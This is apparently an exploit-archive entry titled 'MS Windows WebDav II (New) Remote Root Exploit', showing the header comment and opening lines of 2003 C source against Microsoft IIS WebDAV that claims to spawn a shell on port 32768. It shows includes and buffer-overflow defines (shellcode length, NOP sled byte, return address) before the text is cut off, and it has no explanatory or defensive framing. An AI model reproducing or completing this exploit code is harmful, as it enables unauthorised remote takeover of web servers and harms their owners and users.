MS Windows WebDav II (New) Remote Root Exploit
No description provided by source. // / 29/05/2003 - by Alumni - / / Microsoft IIS WebDAV New Exploit / / spawns shell on port 32768 / // include stdio.h include winsock.h include windows.h define SHELLCODELEN 753 define NOP 0x90 define BUFFERLEN 1024 define RET 0x41424344 define GMHOFF 30 define...